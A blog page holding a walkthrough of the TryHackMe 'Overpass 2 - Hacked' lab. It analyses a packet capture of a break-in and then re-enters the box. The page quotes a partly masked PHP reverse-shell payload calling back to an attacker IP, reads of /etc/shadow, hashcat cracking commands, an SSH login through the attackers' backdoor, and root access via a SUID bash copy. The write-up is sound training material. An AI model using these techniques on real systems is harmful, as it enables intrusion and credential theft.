<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/"><b>>thm/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/archangel/">archangel/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/hackernote/">hackernote/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass/">overpass/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass2_hacked/"><b>>overpass2 hacked/</b></a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass3_hosting/">overpass3 hosting/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/the_great_escape/">the great escape/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/wreath/">wreath/</a></li>
			</ul>
		</li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Initial Information</h1>
<blockquote><p>Overpass has been hacked! Can you analyse the attacker's actions and hack back in?</p>
</blockquote>
<blockquote><p><a href="https://tryhackme.com/room/overpass2hacked">room link</a> Created by <a href="https://tryhackme.com/p/NinjaJc01">NinjaJc01</a></p>
</blockquote>
<h1>Passive analysis</h1>
<p>We got a <code>.pcap</code> network capture file. The best way to open it is to use <code>wireshark</code>.</p>
<ul>
<li><a href="overpass2.pcapng">local copy</a></li>
</ul>
<pre><code>$ wireshark overpass2.pcapng
</code></pre>
<ul>
<li>This will open the file in wireshark (a GUI to browse the contents of this type of files)</li>
</ul>
<p>Our first question is about the URL that attackers used to upload a revshell.<br />
Looking through wireshark we need to find a http request so we can add a <strong>filter</strong> to show <em>only http traffic</em>.
You just need to put <code>http</code> into the filter field on top and it will filter out everything that is not http.
In the first row we can see the path!</p>
<p>The second question is about what kind of payload did they use to get a reverse shell.<br />
We must follow upload.php's http stream and we will find that revshell payload which used nc and php's exec function.</p>
<pre><code>&lt;?pXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX192.168.170.145 4242XXXXXXXXXX?&gt;
</code></pre>
<p>We can see they used port 4242 for the revshell.
Basic nc <strong>revshell traffic can be captured</strong> so we must find it in wireshark.
I sorted by length and I tried to find 4242 in the info.</p>
<p><img src="4242.png" alt="4242.png" /></p>
<p>Following the traffic reveals the password they used in <strong>cleartext</strong>. (<code>wXXXXXXXXXXXXXXXXXXXXt</code>)<br />
We can see the answer to our next question about how the attackers established persistence if we search for <code>http</code>. (<code>hXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXr</code>)
(They used git to clone a repo which helped them)</p>
<p>Since they used <code>cat /etc/shadow</code> we can see user's hashes. We must save them and start cracking them because the attackers probably did the same.</p>
<pre><code>$ hashcat -m 1800 -a 0 userhashes.txt rockyou.txt
</code></pre>
<p>We also have to take a closer look at the backdoor they used because it's in a public git repo!
We can see that a default hash(at the beginning) and a salt(at the end) is hardcoded in the source!</p>
<pre><code>hXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXr/blob/master/main.go

bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX3
1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5
</code></pre>
<p>But the attackers used a different initial hash. We can find it in the nc session in our pcap file.</p>
<pre><code>6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd
</code></pre>
<p>Since we have a hash and a salt we can try to crack it with <code>hashcat</code>.</p>
<pre><code>$ hashcat -m 1710 -a 0 hash:salt rockyou.txt
$ hashcat -m 1710 -a 0 6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd:1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5 /root/wordlists/kali/rockyou/rockyou.txt
</code></pre>
<pre><code>6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd:1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5:nXXXXXXXX6
</code></pre>
<h1>Active enumeration</h1>
<p>As always, we can start with an nmap scan to discover open ports and services running on these ports.</p>
<pre><code>nmap -sC -sV -p- -oN scans/tcpfull 10.10.249.24
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<h2>http - 80/tcp</h2>
<p>We can use <code>curl</code> to make a GET request to the website and we will find out the attackers defaced the website.</p>
<pre><code>curl http://10.10.249.24
&lt;body&gt;
    &lt;div&gt;
        &lt;h1&gt;HXXXXXXXXXXXXXXXXXXXn&lt;/h1&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;p&gt;Secure your servers!&lt;/p&gt;
    &lt;/div&gt;
    &lt;div&gt;&lt;img src=&quot;cooctus.png&quot;&gt;&lt;/div&gt;
&lt;/body&gt;
</code></pre>
<h1>Foothold - ssh 2222/tcp</h1>
<p>Since we know the <strong>port</strong> their backdoor uses and the <strong>password</strong> for it and also the <strong>user</strong> they started the backdoor with we can easily <em>just ssh into the box</em>.</p>
<pre><code>$ ssh james@10.10.249.24 -p 2222
</code></pre>
<pre><code>$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
</code></pre>
<p>If we list the files in the current directory we can see a file named <code>id_rsa</code> which is the current user's (<code>james</code>) private ssh key.
We can copy it to our box to be able to ssh into the box without any password.</p>
<p><strong><em>We used wireshark to extract information about how an attacker / attackers compromised the box. This contained enough information so we could just connect to the box with ssh</em></strong></p>
<pre><code>james@overpass-production:/home/james$ cat user.txt                            
thm{dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX7}
</code></pre>
<h1>Privilege Escalation from james</h1>
<p>I ran <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh">linpeas.sh</a> in order to discover possible privilege escalation vectors on the box.</p>
<pre><code>-rwsr-sr-x 1 root   root       1.1M Jul 22  2020 /home/james/.suid_bash
</code></pre>
<ul>
<li>We found a SUID file owned by root which can be a possible way to root!</li>
</ul>
<pre><code>$ file /home/james/.suid_bash
/home/james/.suid_bash: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped
</code></pre>
<ul>
<li>A linux binary (ELF) with the name mentioning <strong>bash</strong></li>
</ul>
<p>Let's run it and see what happens!</p>
<pre><code>$ /home/james/.suid_bash -p
.sudi_bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
</code></pre>
<ul>
<li>Our <code>euid=0</code> which means we have root privileges!</li>
</ul>
<p><strong><em>We used a SUID binary of bash owned by root here which allowed us to become the root user very easily!</em></strong></p>
<pre><code>cat /root/root.txt
thm{dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd}
</code></pre>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
